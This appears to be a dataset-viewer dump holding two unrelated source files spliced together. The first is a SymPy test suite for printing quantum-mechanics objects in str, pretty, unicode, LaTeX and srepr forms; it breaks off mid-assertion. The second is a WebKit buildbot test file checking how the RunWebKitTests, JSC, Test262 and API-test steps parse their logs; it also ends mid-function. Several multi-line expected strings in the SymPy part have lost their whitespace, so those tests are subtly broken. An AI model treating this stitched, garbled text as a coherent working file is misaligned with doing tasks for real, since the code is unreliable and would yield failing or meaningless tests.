input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
# -*- encoding: utf-8 -*-
"""
TODO:
* Address Issue 2251, printing of spin states
"""
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.cg import CG, Wigner3j, Wigner6j, Wigner9j
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.constants import hbar
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.gate import CGate, CNotGate, IdentityGate, UGate, XGate
from sympy.physics.quantum.hilbert import ComplexSpace, FockSpace, HilbertSpace, L2
from sympy.physics.quantum.innerproduct import InnerProduct
from sympy.physics.quantum.operator import Operator, OuterProduct, DifferentialOperator
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.qubit import Qubit, IntQubit
from sympy.physics.quantum.spin import Jz, J2, JzBra, JzBraCoupled, JzKet, JzKetCoupled, Rotation, WignerD
from sympy.physics.quantum.state import Bra, Ket, TimeDepBra, TimeDepKet
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.sho1d import RaisingOp
from sympy import Derivative, Function, Interval, Matrix, Pow, S, symbols, Symbol, oo
from sympy.core.compatibility import exec_
from sympy.utilities.pytest import XFAIL
# Imports used in srepr strings
from sympy.physics.quantum.spin import JzOp
from sympy.printing import srepr
from sympy.printing.pretty import pretty as xpretty
from sympy.printing.latex import latex
from sympy.core.compatibility import u_decode as u
# Matrix's srepr output spells the class "MutableDenseMatrix", so bind that
# name here so eval'd srepr strings resolve (see sT below, which evals
# srepr output back into an expression).
MutableDenseMatrix = Matrix
# Namespace in which srepr strings are eval'd; pre-populated with every
# sympy/quantum name a printed expression might reference.
ENV = {}
exec_('from sympy import *', ENV)
exec_('from sympy.physics.quantum import *', ENV)
exec_('from sympy.physics.quantum.cg import *', ENV)
exec_('from sympy.physics.quantum.spin import *', ENV)
exec_('from sympy.physics.quantum.hilbert import *', ENV)
exec_('from sympy.physics.quantum.qubit import *', ENV)
exec_('from sympy.physics.quantum.qexpr import *', ENV)
exec_('from sympy.physics.quantum.gate import *', ENV)
exec_('from sympy.physics.quantum.constants import *', ENV)
def sT(expr, string):
    """sreprTest: assert that ``srepr(expr)`` equals *string* and that
    evaluating *string* in ``ENV`` rebuilds an expression equal to *expr*
    (i.e. srepr round-trips).

    Adapted from sympy/printing/tests/test_repr.py.
    """
    printed = srepr(expr)
    assert printed == string
    rebuilt = eval(string, ENV)
    assert rebuilt == expr
def pretty(expr):
    """Render *expr* with the ASCII (non-unicode) pretty printer, without
    line wrapping."""
    options = {'use_unicode': False, 'wrap_line': False}
    return xpretty(expr, **options)
def upretty(expr):
    """Render *expr* with the unicode pretty printer, without line
    wrapping."""
    options = {'use_unicode': True, 'wrap_line': False}
    return xpretty(expr, **options)
def test_anticommutator():
    # Golden-output printing tests for AntiCommutator across every printer:
    # str, ASCII pretty, unicode pretty, latex, and srepr (round-tripped
    # through sT).
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    A = Operator('A')
    B = Operator('B')
    ac = AntiCommutator(A, B)
    # A**2 makes the printed form two rows tall, exercising the stacked
    # bracket layout of the pretty printers.
    ac_tall = AntiCommutator(A**2, B)
    assert str(ac) == '{A,B}'
    assert pretty(ac) == '{A,B}'
    assert upretty(ac) == u'{A,B}'
    assert latex(ac) == r'\left\{A,B\right\}'
    sT(ac, "AntiCommutator(Operator(Symbol('A')),Operator(Symbol('B')))")
    assert str(ac_tall) == '{A**2,B}'
    ascii_str = \
"""\
/ 2 \\\n\
<A ,B>\n\
\\ /\
"""
    ucode_str = \
u("""\
⎧ 2 ⎫\n\
⎨A ,B⎬\n\
⎩ ⎭\
""")
    assert pretty(ac_tall) == ascii_str
    assert upretty(ac_tall) == ucode_str
    assert latex(ac_tall) == r'\left\{A^{2},B\right\}'
    sT(ac_tall, "AntiCommutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))")
def test_cg():
    # Printing tests for the angular-momentum coupling objects: a
    # Clebsch-Gordan coefficient and the Wigner 3j/6j/9j symbols.
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    cg = CG(1, 2, 3, 4, 5, 6)
    wigner3j = Wigner3j(1, 2, 3, 4, 5, 6)
    wigner6j = Wigner6j(1, 2, 3, 4, 5, 6)
    wigner9j = Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9)
    # CG coefficient: printed as a C with super/subscript index rows.
    assert str(cg) == 'CG(1, 2, 3, 4, 5, 6)'
    ascii_str = \
"""\
5,6 \n\
C \n\
1,2,3,4\
"""
    ucode_str = \
u("""\
5,6 \n\
C \n\
1,2,3,4\
""")
    assert pretty(cg) == ascii_str
    assert upretty(cg) == ucode_str
    assert latex(cg) == r'C^{5,6}_{1,2,3,4}'
    sT(cg, "CG(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
    # Wigner 3j symbol: 2x3 array in round brackets.
    assert str(wigner3j) == 'Wigner3j(1, 2, 3, 4, 5, 6)'
    ascii_str = \
"""\
/1 3 5\\\n\
| |\n\
\\2 4 6/\
"""
    ucode_str = \
u("""\
⎛1 3 5⎞\n\
⎜ ⎟\n\
⎝2 4 6⎠\
""")
    assert pretty(wigner3j) == ascii_str
    assert upretty(wigner3j) == ucode_str
    assert latex(wigner3j) == \
        r'\left(\begin{array}{ccc} 1 & 3 & 5 \\ 2 & 4 & 6 \end{array}\right)'
    sT(wigner3j, "Wigner3j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
    # Wigner 6j symbol: 2x3 array in curly brackets.
    assert str(wigner6j) == 'Wigner6j(1, 2, 3, 4, 5, 6)'
    ascii_str = \
"""\
/1 2 3\\\n\
< >\n\
\\4 5 6/\
"""
    ucode_str = \
u("""\
⎧1 2 3⎫\n\
⎨ ⎬\n\
⎩4 5 6⎭\
""")
    assert pretty(wigner6j) == ascii_str
    assert upretty(wigner6j) == ucode_str
    assert latex(wigner6j) == \
        r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \end{array}\right\}'
    sT(wigner6j, "Wigner6j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6))")
    # Wigner 9j symbol: 3x3 array in curly brackets.
    assert str(wigner9j) == 'Wigner9j(1, 2, 3, 4, 5, 6, 7, 8, 9)'
    ascii_str = \
"""\
/1 2 3\\\n\
| |\n\
<4 5 6>\n\
| |\n\
\\7 8 9/\
"""
    ucode_str = \
u("""\
⎧1 2 3⎫\n\
⎪ ⎪\n\
⎨4 5 6⎬\n\
⎪ ⎪\n\
⎩7 8 9⎭\
""")
    assert pretty(wigner9j) == ascii_str
    assert upretty(wigner9j) == ucode_str
    assert latex(wigner9j) == \
        r'\left\{\begin{array}{ccc} 1 & 2 & 3 \\ 4 & 5 & 6 \\ 7 & 8 & 9 \end{array}\right\}'
    sT(wigner9j, "Wigner9j(Integer(1), Integer(2), Integer(3), Integer(4), Integer(5), Integer(6), Integer(7), Integer(8), Integer(9))")
def test_commutator():
    # Golden-output printing tests for Commutator (square-bracket analogue
    # of the AntiCommutator tests above... same printers, same shapes).
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    A = Operator('A')
    B = Operator('B')
    c = Commutator(A, B)
    # A**2 forces the two-row ("tall") pretty-printed form.
    c_tall = Commutator(A**2, B)
    assert str(c) == '[A,B]'
    assert pretty(c) == '[A,B]'
    assert upretty(c) == u'[A,B]'
    assert latex(c) == r'\left[A,B\right]'
    sT(c, "Commutator(Operator(Symbol('A')),Operator(Symbol('B')))")
    assert str(c_tall) == '[A**2,B]'
    ascii_str = \
"""\
[ 2 ]\n\
[A ,B]\
"""
    ucode_str = \
u("""\
⎡ 2 ⎤\n\
⎣A ,B⎦\
""")
    assert pretty(c_tall) == ascii_str
    assert upretty(c_tall) == ucode_str
    assert latex(c_tall) == r'\left[A^{2},B\right]'
    sT(c_tall, "Commutator(Pow(Operator(Symbol('A')), Integer(2)),Operator(Symbol('B')))")
def test_constants():
    # hbar prints as plain 'hbar' in str/ASCII, as ℏ in unicode pretty, and
    # as \hbar in latex; srepr round-trips through the HBar() singleton.
    assert str(hbar) == 'hbar'
    assert pretty(hbar) == 'hbar'
    assert upretty(hbar) == u'ℏ'
    assert latex(hbar) == r'\hbar'
    sT(hbar, "HBar()")
def test_dagger():
    # Dagger of a plain symbol: str keeps the functional form, the pretty
    # printers use a superscript dagger, latex uses x^{\dagger}.
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    x = symbols('x')
    expr = Dagger(x)
    assert str(expr) == 'Dagger(x)'
    ascii_str = \
"""\
+\n\
x \
"""
    ucode_str = \
u("""\
†\n\
x \
""")
    assert pretty(expr) == ascii_str
    assert upretty(expr) == ucode_str
    assert latex(expr) == r'x^{\dagger}'
    sT(expr, "Dagger(Symbol('x'))")
@XFAIL
def test_gate_failing():
    # Known failure (hence @XFAIL): str() of a parameterized UGate is hoped
    # to collapse to 'U(0)', but it currently prints the full matrix form —
    # compare test_gate below, where str(g4) is asserted to include the
    # whole Matrix.
    a, b, c, d = symbols('a,b,c,d')
    uMat = Matrix([[a, b], [c, d]])
    g = UGate((0,), uMat)
    assert str(g) == 'U(0)'
def test_gate():
    # Golden-output printing tests for quantum gates: identity gate,
    # controlled gate, CNOT, and a parameterized UGate, plus a gate applied
    # to a qubit (Mul of gate and ket).
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    a, b, c, d = symbols('a,b,c,d')
    uMat = Matrix([[a, b], [c, d]])
    q = Qubit(1, 0, 1, 0, 1)
    g1 = IdentityGate(2)
    g2 = CGate((3, 0), XGate(1))
    g3 = CNotGate(1, 0)
    g4 = UGate((0,), uMat)
    # Identity gate alone.
    assert str(g1) == '1(2)'
    assert pretty(g1) == '1 \n 2'
    assert upretty(g1) == u'1 \n 2'
    assert latex(g1) == r'1_{2}'
    sT(g1, "IdentityGate(Integer(2))")
    # Identity gate applied to a qubit.
    assert str(g1*q) == '1(2)*|10101>'
    ascii_str = \
"""\
1 *|10101>\n\
2 \
"""
    ucode_str = \
u("""\
1 ⋅❘10101⟩\n\
2 \
""")
    assert pretty(g1*q) == ascii_str
    assert upretty(g1*q) == ucode_str
    assert latex(g1*q) == r'1_{2} {\left|10101\right\rangle }'
    sT(g1*q, "Mul(IdentityGate(Integer(2)), Qubit(Integer(1),Integer(0),Integer(1),Integer(0),Integer(1)))")
    # Controlled-X gate.
    assert str(g2) == 'C((3,0),X(1))'
    ascii_str = \
"""\
C /X \\\n\
3,0\\ 1/\
"""
    ucode_str = \
u("""\
C ⎛X ⎞\n\
3,0⎝ 1⎠\
""")
    assert pretty(g2) == ascii_str
    assert upretty(g2) == ucode_str
    assert latex(g2) == r'C_{3,0}{\left(X_{1}\right)}'
    sT(g2, "CGate(Tuple(Integer(3), Integer(0)),XGate(Integer(1)))")
    # CNOT gate.
    assert str(g3) == 'CNOT(1,0)'
    ascii_str = \
"""\
CNOT \n\
1,0\
"""
    ucode_str = \
u("""\
CNOT \n\
1,0\
""")
    assert pretty(g3) == ascii_str
    assert upretty(g3) == ucode_str
    assert latex(g3) == r'CNOT_{1,0}'
    sT(g3, "CNotGate(Integer(1),Integer(0))")
    # Parameterized UGate: str() shows the full matrix (see the XFAIL test
    # above), while the pretty printers only show 'U' with a subscript.
    ascii_str = \
"""\
U \n\
0\
"""
    ucode_str = \
u("""\
U \n\
0\
""")
    assert str(g4) == \
"""\
U((0,),Matrix([\n\
[a, b],\n\
[c, d]]))\
"""
    assert pretty(g4) == ascii_str
    assert upretty(g4) == ucode_str
    assert latex(g4) == r'U_{0}'
    sT(g4, "UGate(Tuple(Integer(0)),MutableDenseMatrix([[Symbol('a'), Symbol('b')], [Symbol('c'), Symbol('d')]]))")
def test_hilbert():
    # Golden-output printing tests for Hilbert space objects and their
    # direct-sum (+), tensor-product (*), and tensor-power (**) combinations.
    # NOTE(review): the multi-line expected strings look whitespace-mangled
    # in this copy of the file — confirm against upstream before running.
    h1 = HilbertSpace()
    h2 = ComplexSpace(2)
    h3 = FockSpace()
    h4 = L2(Interval(0, oo))
    # Abstract Hilbert space.
    assert str(h1) == 'H'
    assert pretty(h1) == 'H'
    assert upretty(h1) == u'H'
    assert latex(h1) == r'\mathcal{H}'
    sT(h1, "HilbertSpace()")
    # Finite-dimensional complex space C^2.
    assert str(h2) == 'C(2)'
    ascii_str = \
"""\
2\n\
C \
"""
    ucode_str = \
u("""\
2\n\
C \
""")
    assert pretty(h2) == ascii_str
    assert upretty(h2) == ucode_str
    assert latex(h2) == r'\mathcal{C}^{2}'
    sT(h2, "ComplexSpace(Integer(2))")
    # Fock space.
    assert str(h3) == 'F'
    assert pretty(h3) == 'F'
    assert upretty(h3) == u'F'
    assert latex(h3) == r'\mathcal{F}'
    sT(h3, "FockSpace()")
    # L2 space over [0, oo).
    assert str(h4) == 'L2(Interval(0, oo))'
    ascii_str = \
"""\
2\n\
L \
"""
    ucode_str = \
u("""\
2\n\
L \
""")
    assert pretty(h4) == ascii_str
    assert upretty(h4) == ucode_str
    assert latex(h4) == r'{\mathcal{L}^2}\left( \left[0, \infty\right) \right)'
    sT(h4, "L2(Interval(Integer(0), oo, false, true))")
    # Direct sum: '+' in ASCII, ⊕ in unicode.
    assert str(h1 + h2) == 'H+C(2)'
    ascii_str = \
"""\
2\n\
H + C \
"""
    ucode_str = \
u("""\
2\n\
H ⊕ C \
""")
    assert pretty(h1 + h2) == ascii_str
    assert upretty(h1 + h2) == ucode_str
    # Smoke check only: latex output is non-empty; exact form not pinned.
    assert latex(h1 + h2)
    sT(h1 + h2, "DirectSumHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))")
    # Tensor product: 'x' in ASCII, ⨂ in unicode.
    assert str(h1*h2) == "H*C(2)"
    ascii_str = \
"""\
2\n\
H x C \
"""
    ucode_str = \
u("""\
2\n\
H ⨂ C \
""")
    assert pretty(h1*h2) == ascii_str
    assert upretty(h1*h2) == ucode_str
    # Smoke check only: latex output is non-empty; exact form not pinned.
    assert latex(h1*h2)
    sT(h1*h2,
       "TensorProductHilbertSpace(HilbertSpace(),ComplexSpace(Integer(2)))")
    # Tensor power: superscript x2 / ⨂2.
    assert str(h1**2) == 'H**2'
    ascii_str = \
"""\
x2\n\
H \
"""
    ucode_str = \
u("""\
⨂2\n\
H \
""")
    assert pretty(h1**2) == ascii_str
    assert upretty(h1**2) == ucode_str
    assert latex(h1**2) == r'{\mathcal{H}}^{\otimes 2}'
    sT(h1**2, "TensorPowerHilbertSpace(HilbertSpace(),Integer(2))")
def test_innerproduct():
x = symbols('x')
ip1 = InnerProduct(Bra(), Ket())
ip2 = InnerProduct(TimeDepBra(), TimeDepKet())
ip3 = InnerProduct(JzBra(1, 1), JzKet(1, 1))
ip4 = InnerProduct(JzBraCoupled(1, 1, (1, 1)), JzKetCoupled(1, 1, (1, 1)))
ip_tall1 = InnerProduct(Bra(x/2), Ket(x/2))
ip_tall2 = InnerProduct(Bra(x), Ket(x/2))
ip_tall3 = InnerProduct(Bra(x/2), Ket(x))
assert str(ip1) == '<psi|psi>'
assert pretty(ip1) == '<psi|psi>'
assert upretty(ip1) == u'⟨ψ❘ψ⟩'
assert latex(
ip1) == r'\left\langle \psi \right. {\left|\psi\right\rangle }'
sT(ip1, "InnerProduct(Bra(Symbol('psi')),Ket(Symbol('psi')))")
assert str(ip2) == '<psi;t|psi;t>'
assert pretty(ip2) == '<psi;t|psi;t>'
assert upretty(ip2) == u'⟨ψ;t❘ψ;t⟩'
assert latex(ip2) == \
r'\left\langle \psi;t \right. {\left|\psi;t\right\rangle }'
sT(ip2, "InnerProduct(TimeDepBra(Symbol('psi'),Symbol('t')),TimeDepKet(Symbol('psi'),Symbol('t')))")
assert str(ip3) == "<1,1|1,1>"
assert pretty(ip3) == '<1,1|1,1>'
assert upretty(ip3) == u'⟨1,1❘1,1⟩'
assert latex(ip3) == r'\left\langle 1,1 \right. {\left|1,1\right\rangle }'
sT(ip3, "InnerProduct(JzBra(Integer(1),Integer(1)),JzKet(Integer(1),Integer(1)))")
assert str(ip4) == "<1,1,j1=1,j2=1|1,1,j1=1,j2=1>"
assert pretty(ip4) == '<1,1,j1=1,j2=1|1,1,j1=1,j2=1>'
assert upretty(ip4) == u'⟨1,1,j₁=1,j₂=1❘1,1,j₁=1,j₂=1⟩'
assert latex(ip4) == \
r'\left\langle 1,1,j_{1}=1,j_{2}=1 \right. {\left|1,1,j_{1}=1,j_{2}=1\right\rangle }'
sT(ip4, "InnerProduct(JzBraCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))),JzKetCoupled(Integer(1),Integer(1),Tuple(Integer(1), Integer(1)),Tuple(Tuple(Integer(1), Integer(2), Integer(1)))))")
assert str(ip_tall1) == '<x/2|x/2>'
ascii_str = \
"""\
/ | \\ \n\
/ x|x \\\n\
\\ -|- /\n\
\\2|2/ \
"""
ucode_str = \
u("""\
╱ │ ╲ \n\
╱ x│x ╲\n\
╲ ─│─ ╱\n\
╲2│2╱ \
""")
assert pretty(ip_tall1) == ascii_str
assert upretty(ip_tall1) == ucode_str
assert latex(ip_tall1) == \
r'\left\langle \frac{x}{2} \right. {\left|\frac{x}{2}\right\rangle }'
sT(ip_tall1, "InnerProduct(Bra(Mul(Rational(1, 2), Symbol('x'))),Ket(Mul(Rational(1, 2), Symbol('x'))))")
assert str(ip_tall2) == '<x|x/2>'
ascii_str = \
"""\
/ | \\ \n\
/ |x \\\n\
\\ x|- /\n\
\\ |2/ \
"""
ucode_str = \
u("""\
╱ │ ╲ \n\
╱ │x ╲\n\
╲ x│─ | |
<reponame>jacadcaps/webkitty<gh_stars>1-10
#! /usr/bin/env python
import sys
import os
import StringIO
import unittest
import make_passwords_json
import json
# Show DepricationWarnings come from buildbot - it isn't default with Python 2.7 or newer.
# See https://bugs.webkit.org/show_bug.cgi?id=90161 for details.
import warnings
warnings.simplefilter('default')
class BuildBotConfigLoader(object):
    """Make webkitpy (and its auto-installed buildbot) importable before the
    buildbot master config is loaded."""

    def _add_webkitpy_to_sys_path(self):
        # __file__ may be a relative path when the script is invoked as
        # `python test.py`, so resolve it before walking up the tree:
        # <tools>/BuildSlaveSupport/build.webkit.org-config/<this file>.
        config_dir = os.path.dirname(os.path.abspath(__file__))
        support_dir = os.path.dirname(config_dir)
        tools_dir = os.path.dirname(support_dir)
        sys.path.append(os.path.join(tools_dir, 'Scripts'))

    def _add_dependent_modules_to_sys_modules(self):
        self._add_webkitpy_to_sys_path()
        # Alias the auto-installed buildbot so plain `import buildbot` works.
        from webkitpy.thirdparty.autoinstalled import buildbot
        sys.modules['buildbot'] = buildbot
class RunWebKitTestsTest(unittest.TestCase):
    # Tests for RunWebKitTests' stdio parsing. RunWebKitTests is injected
    # into the module namespace by the master-config loading machinery,
    # which is why pylint is silenced below.
    def test_nrwt_leaks_parsing(self):
        run_webkit_tests = RunWebKitTests()  # pylint is confused by the way we import the module ... pylint: disable-msg=E0602
        log_text = """
12:44:24.295 77706 13981 total leaks found for a total of 197,936 bytes.
12:44:24.295 77706 1 unique leaks found.
"""
        # The parser should strip the timestamp/pid prefix and keep the
        # leak-summary lines verbatim.
        expected_incorrect_lines = [
            '13981 total leaks found for a total of 197,936 bytes.',
            '1 unique leaks found.',
        ]
        run_webkit_tests._parseRunWebKitTestsOutput(log_text)
        self.assertEqual(run_webkit_tests.incorrectLayoutLines, expected_incorrect_lines)
    def test_nrwt_missing_results(self):
        run_webkit_tests = RunWebKitTests()  # pylint is confused by the way we import the module ... pylint: disable-msg=E0602
        log_text = """
Expected to fail, but passed: (2)
animations/additive-transform-animations.html
animations/cross-fade-webkit-mask-box-image.html
Unexpected flakiness: text-only failures (2)
fast/events/touch/touch-inside-iframe.html [ Failure Pass ]
http/tests/inspector-enabled/console-clear-arguments-on-frame-navigation.html [ Failure Pass ]
Unexpected flakiness: timeouts (1)
svg/text/foreignObject-repaint.xml [ Timeout Pass ]
Regressions: Unexpected missing results (1)
svg/custom/zero-path-square-cap-rendering2.svg [ Missing ]
Regressions: Unexpected text-only failures (1)
svg/custom/zero-path-square-cap-rendering2.svg [ Failure ]
"""
        # Each section is summarized into a count line; flaky sections
        # (2 text-only + 1 timeout) are combined into '3 flakes'.
        run_webkit_tests._parseRunWebKitTestsOutput(log_text)
        self.assertEqual(set(run_webkit_tests.incorrectLayoutLines),
                         set(['2 new passes', '3 flakes', '1 missing results', '1 failures']))
class StubStdio(object):
    """Minimal stand-in for a buildbot log object: holds a text blob and
    hands it back through getText()."""

    def __init__(self, stdio):
        self._text = stdio

    def getText(self):
        return self._text
class StubRemoteCommand(object):
    # Fake buildbot RemoteCommand: exposes the return code as .rc and the
    # captured stdio as .logs['stdio'] (a StubStdio), matching the interface
    # the build steps read in commandComplete()/evaluateCommand().
    def __init__(self, rc, stdio):
        self.rc = rc
        self.logs = {'stdio': StubStdio(stdio)}
class RunJavaScriptCoreTestsTest(unittest.TestCase):
    # RunJavaScriptCoreTests, SUCCESS and FAILURE are injected by the
    # master-config loading machinery (see BuildBotConfigLoader).
    def assertResults(self, expected_result, expected_text, rc, stdio):
        # Drive the step through a faked completed command and check both
        # the evaluated result code and the summary text.
        cmd = StubRemoteCommand(rc, stdio)
        step = RunJavaScriptCoreTests()
        step.commandComplete(cmd)
        actual_results = step.evaluateCommand(cmd)
        actual_text = step.getText2(cmd, actual_results)
        self.assertEqual(expected_result, actual_results)
        self.assertEqual(actual_text, expected_text)
    # "old output" = Mozilla-suite regression counts; "new output" = JSC
    # stress-test failure counts; the binary variants add a second section.
    def test_no_regressions_old_output(self):
        self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for Mozilla tests:
0 regressions found.
0 tests fixed.
OK.""")
    def test_no_failure_new_output(self):
        self.assertResults(SUCCESS, ["jscore-test"], 0, """Results for JSC stress tests:
0 failures found.
OK.""")
    def test_mozilla_failure_old_output(self):
        self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for Mozilla tests:
1 regression found.
0 tests fixed.""")
    def test_mozilla_failures_old_output(self):
        self.assertResults(FAILURE, ["2 JSC tests failed"], 1, """Results for Mozilla tests:
2 regressions found.
0 tests fixed.""")
    def test_jsc_stress_failure_new_output(self):
        self.assertResults(FAILURE, ["1 JSC test failed"], 1, """Results for JSC stress tests:
1 failure found.""")
    def test_jsc_stress_failures_new_output(self):
        self.assertResults(FAILURE, ["5 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.""")
    def test_jsc_stress_failures_with_binary_results_output(self):
        # Counts from the stress and binary sections are summed (5 + 3 = 8).
        self.assertResults(FAILURE, ["8 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.
Results for JSC test binaries:
3 failures found.""")
    def test_jsc_stress_failures_with_binary_result_output(self):
        self.assertResults(FAILURE, ["6 JSC tests failed"], 1, """Results for JSC stress tests:
5 failures found.
Results for JSC test binaries:
1 failure found.""")
class RunTest262TestsTest(unittest.TestCase):
    # RunTest262Tests, SUCCESS and FAILURE are injected by the master-config
    # loading machinery. Note the step evaluates the *stdio* ("NEW FAIL"
    # lines), so rc is 0 in all cases here.
    def assertResults(self, expected_result, expected_text, rc, stdio):
        cmd = StubRemoteCommand(rc, stdio)
        step = RunTest262Tests()
        step.commandComplete(cmd)
        actual_results = step.evaluateCommand(cmd)
        actual_text = step.getText2(cmd, actual_results)
        self.assertEqual(expected_result, actual_results)
        self.assertEqual(actual_text, expected_text)
    def test_no_regressions_output(self):
        # NEW PASS lines alone do not fail the step.
        self.assertResults(SUCCESS, ["test262-test"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
NEW PASS: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
    def test_failure_output(self):
        # One '! NEW FAIL' line -> one failed test reported.
        self.assertResults(FAILURE, ["1 Test262 test failed"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
    def test_failures_output(self):
        # The same test failing in default and strict mode counts twice.
        self.assertResults(FAILURE, ["2 Test262 tests failed"], 0, """
-------------------------Settings------------------------
Test262 Dir: JSTests/test262
JSC: WebKitBuild/Release/jsc
DYLD_FRAMEWORK_PATH: WebKitBuild/Release
Child Processes: 32
Config file: Tools/Scripts/test262/config.yaml
Expectations file: Tools/Scripts/test262/expectations.yaml
--------------------------------------------------------
NEW PASS test/language/statements/class/fields-after-same-line-static-async-gen-computed-names.js (default)
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (default)
! NEW FAIL: test/annexB/built-ins/Date/prototype/getYear/length.js (strict mode)
NEW PASS test/language/expressions/class/fields-after-same-line-static-method-computed-symbol-names.js (default)
Run with --save to save a new expectations file
Saved all the results in Tools/Scripts/test262/results.yaml
Summarizing results...
See summarized results in Tools/Scripts/test262/results-summary.txt
56071 tests ran
0 expected tests failed
0 tests newly fail
2546 tests newly pass
1241 test files skipped
Done in 247 seconds!
""")
class RunLLINTCLoopTestsTest(unittest.TestCase):
    # RunLLINTCLoopTests, SUCCESS and FAILURE are injected by the
    # master-config loading machinery. The stdio reports 'N regression(s)
    # found.' and the step echoes that count in its summary text.
    def assertResults(self, expected_result, expected_text, rc, stdio):
        cmd = StubRemoteCommand(rc, stdio)
        step = RunLLINTCLoopTests()
        step.commandComplete(cmd)
        actual_results = step.evaluateCommand(cmd)
        actual_text = step.getText2(cmd, actual_results)
        self.assertEqual(expected_result, actual_results)
        self.assertEqual(actual_text, expected_text)
    def test_failures(self):
        self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 regressions found.')
    def test_failure(self):
        self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 regression found.')
    def test_no_failure(self):
        self.assertResults(SUCCESS, ['webkit-jsc-cloop-test'], 0, ' 0 regressions found.')
class Run32bitJSCTestsTest(unittest.TestCase):
    # Run32bitJSCTests, SUCCESS and FAILURE are injected by the
    # master-config loading machinery.
    # NOTE(review): the stdio says 'failure(s) found' while the expected
    # summary text says 'regression(s) found' — confirm Run32bitJSCTests
    # really rewords the count (the wording matches RunLLINTCLoopTestsTest
    # above, so this may be a copy-paste artifact).
    def assertResults(self, expected_result, expected_text, rc, stdio):
        cmd = StubRemoteCommand(rc, stdio)
        step = Run32bitJSCTests()
        step.commandComplete(cmd)
        actual_results = step.evaluateCommand(cmd)
        actual_text = step.getText2(cmd, actual_results)
        self.assertEqual(expected_result, actual_results)
        self.assertEqual(actual_text, expected_text)
    def test_failures(self):
        self.assertResults(FAILURE, ['5 regressions found.'], 1, ' 5 failures found.')
    def test_failure(self):
        self.assertResults(FAILURE, ['1 regression found.'], 1, ' 1 failure found.')
    def test_no_failure(self):
        self.assertResults(SUCCESS, ['webkit-32bit-jsc-test'], 0, ' 0 failures found.')
class RunAPITestsTest(unittest.TestCase):
    # RunAPITests, SUCCESS and FAILURE are injected by the master-config
    # loading machinery. failedTestCount should equal the number of test
    # names listed under the 'Crashed' and 'Timeout' headings combined.
    def assertFailures(self, expected_failure_count, stdio):
        # Derive rc/result/summary-text from the expected failure count,
        # then drive the step through a faked completed command.
        if expected_failure_count:
            rc = 1
            expected_results = FAILURE
            plural_suffix = "" if expected_failure_count == 1 else "s"
            expected_text = '%d api test%s failed or timed out' % (expected_failure_count, plural_suffix)
        else:
            rc = 0
            expected_results = SUCCESS
            expected_text = 'run-api-tests'
        cmd = StubRemoteCommand(rc, stdio)
        step = RunAPITests()
        step.commandComplete(cmd)
        actual_results = step.evaluateCommand(cmd)
        actual_failure_count = step.failedTestCount
        actual_text = step.getText(cmd, actual_results)[0]
        self.assertEqual(expected_results, actual_results)
        self.assertEqual(expected_failure_count, actual_failure_count)
        self.assertEqual(expected_text, actual_text)
    def test_no_failures_or_timeouts(self):
        self.assertFailures(0, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1888 successful
------------------------------
All tests successfully passed!
""")
    def test_no_failures_or_timeouts_with_disabled(self):
